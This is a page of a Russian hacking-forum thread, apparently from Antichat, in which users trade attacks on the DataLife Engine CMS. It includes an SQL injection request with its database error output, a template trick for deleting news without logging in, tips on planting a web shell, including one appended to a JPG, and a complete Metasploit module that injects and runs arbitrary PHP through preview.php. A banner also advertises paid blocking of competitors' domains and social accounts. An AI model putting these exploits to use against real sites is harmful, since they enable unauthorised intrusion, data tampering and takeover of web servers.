[ Обзор уязвимостей DataLife Engine ]

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[ Обзор уязвимостей DataLife Engine ]

Страница 28 из 39

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

02.12.2012, 07:16

slva2000

Новичок

Регистрация: 20.11.2009

Сообщений: 17

С нами: 8670841

Репутация: -4

Цитата:

Сообщение от SecondLife

SQL injection 0day и получение админки для 9.7 и младше
Requirements:

Код:

user account
register_globals on
magic_quotes_gpc off

ГЫ:

dle-news.ru, админ, celsoft:

Цитата:

Сообщение от None

Но лучше именно отключать данную настройку magic_quotes_gpc в php.ini, это плохая настройка, которая тянется еще со времен PHP4, непонятно зачем ее периодически включают. DLE кстати при установке рекомендует ее отключать. Рекомендации лучше не игнорировать.

Главное, не забывать добавить аддслешес, отключая "старую", не нужную...

thx

𝕏 Twitter Reddit Telegram Копировать ссылку

02.12.2012, 15:02

slva2000

Новичок

Регистрация: 20.11.2009

Сообщений: 17

С нами: 8670841

Репутация: -4

Цитата:

Сообщение от Avtoritet

кто начал раскручивать данную скулю? подскажите с чего начать то?

Не знаю, насколько она приватная, если есть в посте годом раньше, но в init.php версии уже 8,0 есть:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cstart'[/COLOR][COLOR="#007700"]] ))[/COLOR][COLOR="#0000BB"]$cstart[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cstart'[/COLOR][COLOR="#007700"]] ); else[/COLOR][COLOR="#0000BB"]$cstart[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

[/COLOR][/COLOR]

а в более новых версиях так же добавили проверку на величину:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$cstart[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]9000000[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"index.php"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]]) );

    die();

}

[/COLOR][/COLOR]

По первому коду: любые данные (пост, куки или гет), тут же переводятся в целое, а при неудаче - присваивается 0.

По второму, думаю понятно..

07.01.2013, 05:20

ysmat

Познающий

Регистрация: 20.04.2006

Сообщений: 67

С нами: 10556706

Репутация: -1

sql в static.php

правда я думаю что малоитересная так как требует

global = on

magic_quotes_gpc = Off

Код:

POST http://dl75.ru/index.php?do=rules 
HTTP/1.0 
Host: dl75.ru 
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1 
Connection: Close 
Content-Type: application/x-www-form-urlencoded 
Content-length: 38  
static_result[id]=99999999999'9999999

результат

Код:

MySQL Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '9999999'' at line 1
UPDATE dle_static set views=views+1 where id='99999999999'9999999'

15.01.2013, 08:56

slva2000

Новичок

Регистрация: 20.11.2009

Сообщений: 17

С нами: 8670841

Репутация: -4

Последняя офф. уязвимость очень жёсткая: переопределение множества переменных возможно через файлы шаблонов.

Необходимо иметь возможность редактировать шаблоны

Целка опасается за переменные:

$file_path

$file_name

$is_logged

$member_id

$cat_info

$config

$user_group

$category_id

$smartphone_detected

$dle_module

Их то и можно переопределить в шаблоне, обратившись к тому файлу, в которых они явно не заданы.

Но на самом деле, этих переменных гораздо больше, они закрыли лишь явно самые опасные.

Пример:

Этот простой запрос, без авторизации на сайте удалит новость с id=2

Запрос: http://site.ru/?hash=111&id=2

Изменения в файле: main.tpl:

Код HTML:

{include file="engine/modules/deletenews.php?is_logged=1&member_id[user_group]=1&dle_login_hash=111&hash=111"}

Дальше всё зависит от вашей фантазии и знания языка. Держись, ДЛЕ

15.01.2013, 16:21

chekist

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 177

С нами: 9731846

Репутация: 622

не прошло и 3х лет как эту багу прикрыли)) лежит в РОА как способ заливки шелла из админки

PS описывать не буду, кто не учил пхп идут учить

PSS slva2000 слепой что ли is_logged и member_id попадает под фильтр, главное что прикрыли способ заливки шелла

16.01.2013, 08:31

slva2000

Новичок

Регистрация: 20.11.2009

Сообщений: 17

С нами: 8670841

Репутация: -4

Цитата:

Сообщение от chekist

не прошло и 3х лет как эту багу прикрыли)) лежит в РОА как способ заливки шелла из админки
PS описывать не буду, кто не учил пхп идут учить
PSS slva2000 слепой что ли is_logged и member_id попадает под фильтр, главное что прикрыли способ заливки шелла

Да не, не слепой, только что пробовал описанным мной примером. Дальше не копал.

Про заливку шелла, любопытно, намекни направление в котором искать?

01.02.2013, 23:28

passwd.me

Новичок

Регистрация: 29.01.2013

Сообщений: 1

С нами: 6992246

Репутация: 0

DataLife Engine preview.php PHP Code Injection

DataLife Engine preview.php PHP Code Injection

Код:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3  'DataLife Engine preview.php PHP Code Injection',
      'Description'    => %q{
          This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
        The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
        with the e modifier, which allows to inject arbitrary php code, when the template
        in use contains a [catlist] or [not-catlist] tag.
      },
      'Author'         =>
        [
          'EgiX', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-1412' ],
          [ 'BID', '57603' ],
          [ 'EDB', '24438' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
          [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'Keys'   => ['php']
        },
      'DisclosureDate' => 'Jan 28 2013',
      'Targets'        => [ ['DataLife Engine 9.7', { }], ],
      'DefaultTarget'  => 0
      ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
      ], self.class)
  end

  def base
    base = normalize_uri(target_uri.path)
    base   "#{base}engine/preview.php",
        'method'    => 'POST',
        'vars_post' =>
          {
            'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
          }
      })

    if res and res.code == 200 and res.body =~ /#{fingerprint}/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    @peer = "#{rhost}:#{rport}"

    print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
    res = send_request_cgi(
      {
        'uri'       =>  "#{base}engine/preview.php",
        'method'    => 'POST',
        'vars_post' =>
          {
            'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
          }
      })
  end
end

source:

http://packetstormsecurity.com/files/119978/datalife_preview_exec.rb.txt

02.02.2013, 07:06

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

С нами: 9176038

Репутация: 8

Мне кажется или метасплойтовские эксплойты тут никому нафиг не нужны?

07.02.2013, 11:35

extrimportal

Участник форума

Регистрация: 13.11.2010

Сообщений: 102

С нами: 8155766

Репутация: 0

Народ кто что скажет об этом

http://verner.asf.ru/2013/%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC-dle-%D0%B7%D0%B0%D0%B3%D1%80%D1%83%D0%B7%D0%BA%D0%BE%D 0%B9-%D0%B0%D0%B2%D0%B0%D1%82%D0%B0%D1%80%D0%B0-%D1%81-%D0%B2%D1%80%D0%B5%D0%B4%D0%BE%D0%BD%D0%BE%D1%81%D 0%BD%D1%8B/

как запустить хреновину?)

#10

08.02.2013, 00:55

SpYeR

Новичок

Регистрация: 11.11.2007

Сообщений: 17

С нами: 9735524

Репутация: 6

Цитата:

Сообщение от extrimportal

Народ кто что скажет об этом
http://verner.asf.ru/2013/%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC-dle-%D0%B7%D0%B0%D0%B3%D1%80%D1%83%D0%B7%D0%BA%D0%BE%D 0%B9-%D0%B0%D0%B2%D0%B0%D1%82%D0%B0%D1%80%D0%B0-%D1%81-%D0%B2%D1%80%D0%B5%D0%B4%D0%BE%D0%BD%D0%BE%D1%81%D 0%BD%D1%8B/
как запустить хреновину?)

Можно залить шелл, дописав его в конец JPG файла, но толку от этого мало.

Страница 28 из 39

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор уязвимостей WordPress ]	ettee	Веб-уязвимости	383	23.11.2019 05:00
Обзор уязвимостей в платных CMS	ZAMUT	Веб-уязвимости	90	03.12.2017 01:35
DataLife Engine v.6.5. Null	Student :)	ПО для Web разработчика	31	23.02.2008 15:36
[ Обзор уязвимостей miniBB ]	-=lebed=-	Уязвимости CMS / форумов	3	12.01.2008 20:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules